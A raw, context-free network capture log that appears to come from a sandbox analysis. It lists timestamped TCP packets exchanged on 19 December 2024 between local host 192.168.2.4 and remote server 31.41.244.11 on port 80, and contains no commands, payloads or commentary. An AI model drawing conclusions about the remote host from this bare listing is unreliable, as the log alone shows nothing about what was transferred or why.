                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.701930046 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.702060938 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.702096939 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.702219963 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.703000069 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.703150988 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.703181028 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.703255892 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.704144001 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.704194069 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.704212904 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.704284906 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.705287933 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.705344915 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.705352068 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.705404997 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.706342936 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.706394911 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.706433058 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.706510067 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.707407951 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.707488060 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.707526922 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.707619905 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.708579063 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.708699942 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.708736897 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.708784103 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.709698915 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.709795952 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.709800959 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.709860086 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.710763931 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.710854053 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.710891008 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.710937023 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.711904049 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.711972952 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.712002039 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.712058067 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.712994099 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.713088989 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.713165045 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.713217020 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.714133024 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.714189053 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.714206934 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.714257956 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.715204954 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.715220928 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.715264082 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.715264082 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.716367960 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.716409922 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.716449022 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.716537952 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.717451096 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.717498064 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.717509031 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.717575073 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.720237970 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.720318079 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.721390009 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.721457958 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.721693039 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.721709967 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.721754074 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.722059965 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.722076893 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.722110033 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.722126007 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.723107100 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.723193884 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.723237038 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.723284960 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.723468065 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.723520994 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.723534107 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.723638058 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.725774050 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.725790977 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.725851059 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.725851059 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.726706982 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.726722956 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.727849960 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.727869987 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.727905035 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.727993965 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.728626013 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.728796959 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.729681969 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.729984999 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.730000973 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.730623007 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.730854988 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.730957985 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.731008053 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.731101990 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.731952906 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.732109070 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.732213020 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.733016968 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.733032942 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.733051062 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.733067989 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.733100891 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.733100891 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.733145952 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.734105110 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.734253883 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.734438896 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.735260010 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.735275984 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.735327005 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.735327005 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.736300945 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.736370087 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.736568928 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.737371922 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.737488031 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.737612963 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.738518000 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.738589048 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.738612890 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.738806963 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.739675045 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.739691973 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.739752054 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.739752054 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.740783930 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.740799904 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.740932941 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.741946936 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.742024899 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.742052078 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.742069960 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.742919922 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.743077040 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.743099928 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.743204117 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.744060040 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.744111061 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.744193077 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.745110035 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.745230913 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.745279074 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.745335102 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.746315002 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.746330023 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.746382952 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.746382952 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.747363091 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.747493982 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.747582912 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.748433113 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.748519897 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.748522997 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.748557091 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.883121967 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.883208990 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.883229971 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.883275986 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.883690119 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.883757114 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.883806944 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.883806944 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.884704113 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.884756088 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.884803057 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.885314941 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.885821104 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.885976076 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.886004925 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.886107922 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.887023926 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.887100935 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.887140989 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.887140989 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.888076067 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.888185024 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.888272047 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.889187098 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.889292955 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.889359951 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.890245914 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.890314102 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.890367031 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.891269922 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.891360998 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.891593933 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.891643047 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.891705036 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.892566919 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.892584085 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.892663002 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.892705917 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.893606901 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.893726110 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.893779039 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.894752026 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.894768953 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.894840002 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.895839930 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.895889997 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.895916939 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.896209002 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.896908045 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.897005081 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.897046089 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.897355080 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.898036957 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.898085117 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.898123980 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.899133921 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.899329901 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.899347067 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.900213957 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.900310040 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.900374889 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.900425911 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.901366949 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.901382923 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.901441097 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.901441097 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.902550936 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.902566910 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.902616978 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.902616978 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.903626919 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.903794050 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.903841019 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.904048920 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.904736042 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.904798985 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.904803038 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.904896021 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.905797005 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.905889034 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.905971050 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.906903982 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.906972885 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.906984091 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.907108068 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.908051014 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.908124924 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.908385038 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.909178972 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.909231901 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.909240961 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.909267902 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.910329103 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.910345078 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.910396099 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.911358118 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.911407948 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.911475897 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.912494898 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.912550926 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.912722111 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.913569927 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.913662910 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.913714886 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.914117098 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.914639950 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.914694071 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.914738894 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.914855957 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.915761948 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.915831089 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.915860891 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.915925026 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.916914940 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.917043924 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.917068958 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.917138100 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.918026924 CET804986031.41.244.11192.168.2.4
